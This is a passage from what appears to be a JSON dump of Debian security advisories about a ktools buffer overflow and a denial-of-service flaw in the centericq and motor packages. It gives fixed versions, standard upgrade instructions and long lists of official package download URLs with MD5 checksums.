http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_ia64.deb\n Size/MD5 checksum: 1881326 29a00f7babe9fcbd3031d7b3d032bf53\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_ia64.deb\n Size/MD5 checksum: 335884 0d8612578ca347c502d04ea5cd1b4e4e\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_ia64.deb\n Size/MD5 checksum: 1882224 fc679fe6d852efb6e9e3d8d1888d525f\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_ia64.deb\n Size/MD5 checksum: 1881394 ffda1eed53efc1f8599fcb837cd66cc0\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_hppa.deb\n Size/MD5 checksum: 1812462 f253748c6a8bf09d31db8dd5f5554ad0\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_hppa.deb\n Size/MD5 checksum: 336634 1aa8cbb6f893217af25cc5af5e9bdc0c\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_hppa.deb\n Size/MD5 checksum: 1813518 3e6083c3e3438ebc40fd21ee414e2c3b\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_hppa.deb\n Size/MD5 checksum: 1812508 68a3677b2dac459f970834975f912b31\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_m68k.deb\n Size/MD5 checksum: 1399430 44c35ad2e854ab372a8a1491842e0956\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_m68k.deb\n Size/MD5 checksum: 336720 bd4440ba3d65a24caa97b0438aaaa5c0\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_m68k.deb\n Size/MD5 checksum: 1400044 7cda71a1524e83942e82c6de54dba1d3\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_m68k.deb\n Size/MD5 checksum: 1399462 37249094705dc33b8f56e8b042c6f519\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_mips.deb\n Size/MD5 checksum: 1493070 1dfa1f92a38b12c7643711db57d63d58\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_mips.deb\n Size/MD5 checksum: 336634 a1c3383dcd7a2be6a57c3b9e140b63ff\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_mips.deb\n Size/MD5 checksum: 1493688 bb4f5026b751a06335dddbbf10396726\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_mips.deb\n Size/MD5 checksum: 1493134 c1edf7389fa031bd22e93e87efaf56ad\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_mipsel.deb\n Size/MD5 checksum: 1483286 f41bb70b6c3e94b9d34382070f1b904a\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_mipsel.deb\n Size/MD5 checksum: 335926 95d59321de2d69437a51dd57cc3f3968\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_mipsel.deb\n Size/MD5 checksum: 1483854 5304d58c141da6d498bd1ca44257a00f\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_mipsel.deb\n Size/MD5 checksum: 1483342 965a7c6b445968094da416ef59155e94\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_powerpc.deb\n Size/MD5 checksum: 1385102 b461f814a843a99cf02279c38c2a13c1\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_powerpc.deb\n Size/MD5 checksum: 336630 c52ee41c89e18fe67ed255f6ed06b391\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_powerpc.deb\n Size/MD5 checksum: 1385672 561fd887df51fd281fb1b00a4705dec5\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_powerpc.deb\n Size/MD5 checksum: 1385268 5e2818805952871d4385d3f83dc1446e\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_s390.deb\n Size/MD5 checksum: 1193992 85972c3db828122d8bf3587b5aab56cf\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_s390.deb\n Size/MD5 checksum: 336612 d4ea593319ad2cd29ae841ba41dec7fc\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_s390.deb\n Size/MD5 checksum: 1194290 29fb2417371e7883551312f71e2cd452\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_s390.deb\n Size/MD5 checksum: 1194030 c383023e1dad16a48cba3699bf978bc4\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge3_sparc.deb\n Size/MD5 checksum: 1325960 2d36893524353a685bc15a02f7cdfcfe\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge3_sparc.deb\n Size/MD5 checksum: 336630 5903d1d68b6a0bc21fbd09e2b668827b\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge3_sparc.deb\n Size/MD5 checksum: 1326906 6e5d6c3230ce3cef504608f8e7472c43\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge3_sparc.deb\n Size/MD5 checksum: 1325994 7192ffdae9ca8748d9cca9453789075d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-11-30T00:00:00", "published": "2005-11-30T00:00:00", "id": "DEBIAN:DSA-912-1:F505A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00313.html", "title": "[SECURITY] [DSA 912-1] New centericq packages fix denial of service", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-30T02:22:29", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1088-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJune 3rd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : centericq\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3863\nBugTraq ID : 15600\nDebian Bug : 340959\n\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in centericq, a text-mode multi-protocol\ninstant messenger client, which may lead local or remote attackers to\nexecute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 4.5.1-1.1woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 4.20.0-1sarge4.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 4.21.0-6.\n\nWe recommend that you upgrade your centericq package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2.dsc\n Size/MD5 checksum: 603 792e9548d8f6d540c26fa0fdbdd1df57\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2.diff.gz\n Size/MD5 checksum: 3827 dc51504b36a05b003de1d22c2c879223\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1.orig.tar.gz\n Size/MD5 checksum: 680625 e50121ea43a54140939b7bec8efdefe0\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_alpha.deb\n Size/MD5 checksum: 868742 1e533bd67111dbaca069ec6a7e9122ec\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_arm.deb\n Size/MD5 checksum: 809068 400376da91c99a970032220e39de0c73\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_i386.deb\n Size/MD5 checksum: 648950 4b30966a06e54085bbb8db33f03beeca\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_ia64.deb\n Size/MD5 checksum: 930922 f8aaa7129fb4ffc5de2468662166db5f\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_hppa.deb\n Size/MD5 checksum: 821294 79ffab208975e12fb264cbb4ef36c6b3\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_m68k.deb\n Size/MD5 checksum: 612174 969fff39d5249b24d5c711cc312a92d4\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_mips.deb\n Size/MD5 checksum: 649086 11f73ccf6f59687b0e9f4eb2d939fc93\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_mipsel.deb\n Size/MD5 checksum: 634462 2a54c83a7a9f5a47495e7d608d2705bd\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_powerpc.deb\n Size/MD5 checksum: 633210 21767275a156aa5309d2febe03e395db\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_s390.deb\n Size/MD5 checksum: 534764 483dda7f47f832ef50ae50a721164e62\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.5.1-1.1woody2_sparc.deb\n Size/MD5 checksum: 617338 1eeee2554ee66d37458909aea51e0b18\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4.dsc\n Size/MD5 checksum: 851 347a8183b403014c403f1757f353e436\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4.diff.gz\n Size/MD5 checksum: 106308 ee5a0e2b155ab6ee35c7be04941cb574\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0.orig.tar.gz\n Size/MD5 checksum: 1796894 874165f4fbd40e3be677bdd1696cee9d\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_alpha.deb\n Size/MD5 checksum: 1650570 6addf20af3c5fce5003cfcd998c88dad\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_alpha.deb\n Size/MD5 checksum: 336024 cabf30b626c0b1ffc7adc474e650b0da\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_alpha.deb\n Size/MD5 checksum: 1651594 c9b361454f6ed7546d6b7fcfb417c420\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_alpha.deb\n Size/MD5 checksum: 1650632 414f32a3fee64fcfe7b98365d64486f1\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_amd64.deb\n Size/MD5 checksum: 1355518 6bc3845c82740d0b089337dd3068078e\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_amd64.deb\n Size/MD5 checksum: 336006 6eee21ecd6ee4600813192d98ca172e7\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_amd64.deb\n Size/MD5 checksum: 1355798 226ae854f90219c9cc8c662b9be2e903\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_amd64.deb\n Size/MD5 checksum: 1355566 27d8db8b20503f0527e558846b20ebbb\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_arm.deb\n Size/MD5 checksum: 2185394 bf00243e825f49f26585f547cec1f404\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_arm.deb\n Size/MD5 checksum: 336028 ce7a340b924cb1ab7a571fdc0c301945\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_arm.deb\n Size/MD5 checksum: 2186140 adf229a4553875379348b1688f910678\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_arm.deb\n Size/MD5 checksum: 2185460 7375a4503258d1fcb9d4f03d34b54cf4\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_i386.deb\n Size/MD5 checksum: 1348826 1f8a99153aa93509805a95eedfb1e493\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_i386.deb\n Size/MD5 checksum: 335880 51caf40c0a4cb709ed257453e46fcc74\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_i386.deb\n Size/MD5 checksum: 1349608 2b46f86353b8b1323e6776c23c434750\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_i386.deb\n Size/MD5 checksum: 1348924 608dd61bfbb98d99867eefabcccbbbae\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_ia64.deb\n Size/MD5 checksum: 1881388 88f88e10e529a68cfb6ebd2d9ce76fb2\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_ia64.deb\n Size/MD5 checksum: 335984 577780bd2cf3fffd54f985dfe71c9b28\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_ia64.deb\n Size/MD5 checksum: 1882292 9d43ae3452ed00c896882a40f4e2b21f\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_ia64.deb\n Size/MD5 checksum: 1881456 a5350a5fe409bfc0545ce0d3b6201e99\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_hppa.deb\n Size/MD5 checksum: 1812604 ba840154c90fa7fd5c5d27f629a4e7d0\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_hppa.deb\n Size/MD5 checksum: 336684 49cbe7f7dacb8774e60cde1c436647eb\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_hppa.deb\n Size/MD5 checksum: 1813616 3a3358848c14c28e63a317a87111bcf5\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_hppa.deb\n Size/MD5 checksum: 1812646 d4d53c94a0670042863ba66bf822c8af\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_m68k.deb\n Size/MD5 checksum: 1399506 050350f784fa16edc990a0af9094d360\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_m68k.deb\n Size/MD5 checksum: 336772 ff95d538d955d3f3a29c2b1b76b1629b\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_m68k.deb\n Size/MD5 checksum: 1400204 6787c44b90c3e24a2e550661f2070024\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_m68k.deb\n Size/MD5 checksum: 1399546 960a182de7c92c96153f95f7858288b6\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_mips.deb\n Size/MD5 checksum: 1493242 45baa39468c703cebbb3e7135992fe08\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_mips.deb\n Size/MD5 checksum: 336704 aa4c66a0022918403b8b5725f888f1f9\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_mips.deb\n Size/MD5 checksum: 1493744 7758a3e4853e9735bddceecdde402a37\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_mips.deb\n Size/MD5 checksum: 1493310 3b92ec1941f96ba976c7c98824231566\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_mipsel.deb\n Size/MD5 checksum: 1483388 bf669f331a7becc56851b41c70f0dbcf\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_mipsel.deb\n Size/MD5 checksum: 336048 7a7ecf280bc1d03e79af0cfa794ddb9a\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_mipsel.deb\n Size/MD5 checksum: 1483970 c3cd579d088ad124053bd73a2633a470\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_mipsel.deb\n Size/MD5 checksum: 1483438 7d1493bfa167fd7f7644232e215fad7f\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_powerpc.deb\n Size/MD5 checksum: 1386192 92d2bce7027d47f82e68f50a2a54892f\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_powerpc.deb\n Size/MD5 checksum: 336702 8cab14ba1f096f2e2588120b5cf06e97\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_powerpc.deb\n Size/MD5 checksum: 1386680 58e198a5b828b1abb309630ecf966bf7\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_powerpc.deb\n Size/MD5 checksum: 1386242 8e54c9ce0432cebc1c9f95001d6edb15\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_s390.deb\n Size/MD5 checksum: 1194054 20c8220d71c45fc511d363fd434e88eb\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_s390.deb\n Size/MD5 checksum: 336668 078e0cf4a6ba1e74668f7f8cf04adb0d\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_s390.deb\n Size/MD5 checksum: 1194422 49ac26d59e6c572f38dfdd061945fa36\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_s390.deb\n Size/MD5 checksum: 1194088 5eb550e0f1d026c258ad84f7ef7f680e\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge4_sparc.deb\n Size/MD5 checksum: 1326004 a7db40a610eb3b6dcfe96a5909cc8313\n http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge4_sparc.deb\n Size/MD5 checksum: 336682 f28c264b6cedbf41aaf46e32f7bb7c12\n http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge4_sparc.deb\n Size/MD5 checksum: 1327028 044779001762380ee8a32bcc1193ea12\n http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge4_sparc.deb\n Size/MD5 checksum: 1326022 3084bf7ba7146a24608d84796a9c50eb\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2006-06-03T00:00:00", "published": "2006-06-03T00:00:00", "id": "DEBIAN:DSA-1088-1:6BA4D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00174.html", "title": "[SECURITY] [DSA 1088-1] New centericq packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:24", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1083-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 31st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : motor\nVulnerability : buffer overflow\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2005-3863\nDebian Bug : 368400\n\nMehdi Oudad and Kevin Fernandez discovered a buffer overflow in the\nktools library which is used in motor, an integrated development\nenvironment for C, C++ and Java, which may lead local attackers to\nexecute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.2.2-2woody1.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.4.0-2sarge1.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.4.0-6.\n\nWe recommend that you upgrade your motor package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1.dsc\n Size/MD5 checksum: 636 932fa3ce87130b09e516ca4419cdd0da\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1.diff.gz\n Size/MD5 checksum: 3462 babba5e4b1c2e695836582ce15954812\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2.orig.tar.gz\n Size/MD5 checksum: 454423 2ba1c22fb3c76209be185b4cbb7a2bfb\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_alpha.deb\n Size/MD5 checksum: 738572 19d012b605af9df5be7920c2d1c14c2b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_arm.deb\n Size/MD5 checksum: 653042 d3d0f37780f1fdf1e9a01b0cd804829e\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_i386.deb\n Size/MD5 checksum: 549282 522c5ac389fad6cc3fb6b350022b3446\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_ia64.deb\n Size/MD5 checksum: 795334 5a7504789d50cdf37581d068df336955\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_hppa.deb\n Size/MD5 checksum: 662582 7d53430905f547c2634186a462ce415a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_m68k.deb\n Size/MD5 checksum: 517012 5c91f1cd222e656baf4310d42144feb9\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_mips.deb\n Size/MD5 checksum: 529124 d9a7e82738c9ed4eab95de37e7359316\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_mipsel.deb\n Size/MD5 checksum: 521888 8de2e1c0ccbf511f67b337344e9348c8\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_powerpc.deb\n Size/MD5 checksum: 543442 61e434e789e18e8b239fa982812e8ad1\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_s390.deb\n Size/MD5 checksum: 465874 d08b495f50fb4edfdfd8ea84c3c35ee9\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.2.2-2woody1_sparc.deb\n Size/MD5 checksum: 527592 aaf50e919624329bc2c7f53fdb37bb30\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1.dsc\n Size/MD5 checksum: 815 5d26d9fb0c432aa7ea49a22558ee41b4\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1.diff.gz\n Size/MD5 checksum: 20178 3edb3f737d0d6c9d29ff6bfc8bebf8ae\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0.orig.tar.gz\n Size/MD5 checksum: 572571 c9ff6aade7105a90df11ccfd51592bec\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/m/motor/motor-common_3.4.0-2sarge1_all.deb\n Size/MD5 checksum: 180060 e10533391309045ebc5c8c6240a66390\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_alpha.deb\n Size/MD5 checksum: 400350 1e1cb43ff88df11ab331db1ec2064da6\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_alpha.deb\n Size/MD5 checksum: 400456 f2083703d009a1c55b3de99a3a67a0cd\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_amd64.deb\n Size/MD5 checksum: 324104 79cf88f5d9132b2ec4d028e49781c12b\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_amd64.deb\n Size/MD5 checksum: 324110 ee02473a890ff964499e6f3a571be44b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_arm.deb\n Size/MD5 checksum: 515546 c0077e0bf48ce9d4ace9f0b955a37bf1\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_arm.deb\n Size/MD5 checksum: 515532 f85e4041f81fd88f7c8406b59be1f7f1\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_i386.deb\n Size/MD5 checksum: 329436 bba002e6bd072e2cc8bd216402a46d86\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_i386.deb\n Size/MD5 checksum: 329462 e32f51cbfb70a26c91758d3e9efaf11d\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_ia64.deb\n Size/MD5 checksum: 467542 e1f4f43dc7d2bc708467c28c929d51ac\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_ia64.deb\n Size/MD5 checksum: 467576 c8aa0f65f1663d3b9cda661af9ab8003\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_hppa.deb\n Size/MD5 checksum: 428216 3cbafe2c74ed5f812148cddaf6afb93c\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_hppa.deb\n Size/MD5 checksum: 428292 ced41374caa59da300affe46746bba81\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_m68k.deb\n Size/MD5 checksum: 341358 47547f8004245481b2cb0c77d7ac5dc0\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_m68k.deb\n Size/MD5 checksum: 341424 2b0b093297255a2617a9e67001a42320\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_mips.deb\n Size/MD5 checksum: 371424 2394101cfd5b979bf76f24dd0c33ff3a\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_mips.deb\n Size/MD5 checksum: 371468 eacd6bde371442bd12a91849a2163158\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_mipsel.deb\n Size/MD5 checksum: 369150 53856f0d1135e9a71e638691976fe76a\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_mipsel.deb\n Size/MD5 checksum: 369194 824398e12fae38644112d7b07f54f97a\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_powerpc.deb\n Size/MD5 checksum: 344178 dad299ed53a42adad6f8df1902342fe3\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_powerpc.deb\n Size/MD5 checksum: 344240 64883e84f2407aa464dfb68558cd2fb4\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_s390.deb\n Size/MD5 checksum: 298896 51043d25447ba66eeb15c45f8fe8ceb0\n http://security.debian.org/pool/updates/main/m/motor/motor-fribidi_3.4.0-2sarge1_s390.deb\n Size/MD5 checksum: 298904 8b1c71ba4a96d828bd7c04763f31f3a0\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/motor/motor_3.4.0-2sarge1_sparc.deb\n Size/MD5 checksum: 324868 f38dcee356c6d8c5b7c453ca549ff1a7\n 